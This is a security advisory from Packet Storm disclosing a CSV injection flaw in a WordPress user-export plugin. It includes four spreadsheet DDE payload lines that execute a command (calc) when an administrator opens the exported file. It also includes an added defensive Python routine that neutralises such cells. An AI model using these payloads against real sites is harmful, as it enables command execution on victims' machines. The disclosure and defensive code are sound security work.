WordPress Export Users To CSV 1.1.1 CSV Injection

Posted Aug 16, 2018
Authored by Javier Olmedo

WordPress Export Users to CSV plugin version 1.1.1 suffers from a CSV injection vulnerability.

tags | exploit
SHA-256 | b300b31e2bd3c5ffcd8e03ac88eda85de9048362ed027cc29e08a93f254916ef

# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-14
# Google Dork: N/A
# Vendor: Matt Cromwell
# Software Link: https://wordpress.org/plugins/export-users-to-csv/
# Affected Version: 1.1.1 and before
# Active installations: +20,000
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64

# 1. Plugin Description:
# WordPress Export Users to CSV plugin exports user data and meta data.
# You can even export the users by role and registration date range.

# 2. Technical Description:
# WordPress Export Users to CSV plugin version 1.1.1 and earlier are affected by Remote Code Execution
# through a CSV injection vulnerability. An application user can inject spreadsheet formulas (commands) into
# the fields of their own profile; these commands are executed when a user with greater privileges
# exports the user data to CSV and opens that file on their machine.

# 3. Proof Of Concept (PoC):
# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any profile field, for example the biography.
# When a user with high privileges logs in to the application, exports the data to CSV and opens the
# generated file, the command is executed and the calculator opens on their machine.

# 4. Payloads:
=SUM(1+1)*cmd|' /C calc'!A0
+SUM(1+1)*cmd|' /C calc'!A0
-SUM(1+1)*cmd|' /C calc'!A0
@SUM(1+1)*cmd|' /C calc'!A0
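The root cause in sections 2 and 3 is that profile fields are written into the CSV unchanged, so a cell beginning with =, +, -, @ (or a tab/carriage return) is evaluated as a formula by the spreadsheet that opens the export. The following is an added defender's example, not code from the advisory or from the plugin (which is PHP): a Python export routine that neutralizes such cells with a leading single quote and quotes every field, run over a constructed user list that includes the payload above. All function names and the sample records are hypothetical.

```python
import csv
import io

# Characters that spreadsheet applications treat as the start of a formula
# when they appear first in a cell (the OWASP CSV injection trigger set).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """Flag a user-supplied field that a spreadsheet would evaluate as a formula.

    Leading spaces are stripped first, conservatively, because some importers
    trim whitespace before deciding whether a cell is a formula.
    """
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Return the cell text made inert for spreadsheet consumers.

    A leading single quote forces the cell to be read as text. This also
    affects legitimate values such as "-5"; that is the accepted trade-off
    for an export that may be opened in Excel or LibreOffice.
    """
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_users_csv(rows, fields) -> str:
    """Render user records as CSV with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fields)
    for row in rows:
        writer.writerow(neutralize_cell(row.get(f)) for f in fields)
    return buf.getvalue()


# Constructed sample: a low-privilege user has placed the advisory's payload
# in the "description" (biography) profile field.
SAMPLE_USERS = [
    {"user_login": "alice", "user_email": "alice@example.test",
     "description": "Editor at Example"},
    {"user_login": "mallory", "user_email": "mallory@example.test",
     "description": "=SUM(1+1)*cmd|' /C calc'!A0"},
]
FIELDS = ["user_login", "user_email", "description"]

if __name__ == "__main__":
    print(export_users_csv(SAMPLE_USERS, FIELDS))
```

The same `is_formula_like` check can be applied when a profile field is saved, to log or reject formula-looking input before it ever reaches an export.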

© 2024 Packet Storm. All rights reserved.